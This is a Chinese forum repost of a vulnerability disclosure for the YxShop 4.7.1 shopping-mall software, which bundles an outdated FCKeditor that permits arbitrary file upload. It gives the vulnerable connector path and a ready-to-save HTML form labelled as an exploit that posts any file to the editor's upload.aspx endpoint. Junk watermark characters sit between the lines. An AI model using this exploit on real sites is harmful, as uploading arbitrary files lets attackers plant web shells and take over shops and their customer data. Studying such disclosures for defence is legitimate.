中国网络渗透测试联盟
标题:
YxShop易想购物商城4.7.1版本任意文件上传漏洞
[打印本页]
作者:
admin
时间:
2012-9-10 20:46
标题:
YxShop易想购物商城4.7.1版本任意文件上传漏洞
披露状态:2011-07-19: 细节已通知厂商并且等待厂商处理中
8 q5 @- T- J l) T
2011-07-20: 厂商已经主动忽略漏洞,细节向公众公开
8 { J2 w! U2 P0 H& N6 t3 U/ o6 o
简要描述:这个号称中国首家ASP.NET免费开源商城购物系统。最新版本是4.7,竟然采用2.4版本以下的fckeditor编辑器。所以可以直接上传任意文件。
) O0 P) H0 t1 Z2 V$ S/ U" i. m
详细说明:其他版本我没测试,估计也是一样的问题
j' d4 i! M/ F* o( r k% d8 @
http://127.0.0.1/controls/fckedi ... aspx/connector.aspx
; P& G0 \: Q3 K |/ s3 t
跳转到网站根目录上传任意文件。
+ e- N" x/ {9 W; K0 {/ Z
漏洞证明:如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
' b; p2 O: N B+ g& P
<form id="frmUpload" enctype="multipart/form-data" action="http://127.0.0.1/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
3 w* `3 Y9 Y, D& e
Upload a new file:<br>
/ j6 y4 J- w* P1 A
<input type="file" name="NewFile" size="50"><br>
0 E. H: P' i; N: V- w9 X* p* }
<input id="btnUpload" type="submit" value="Upload">
* K' p/ J7 b k5 j5 C0 c5 o
</form>
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2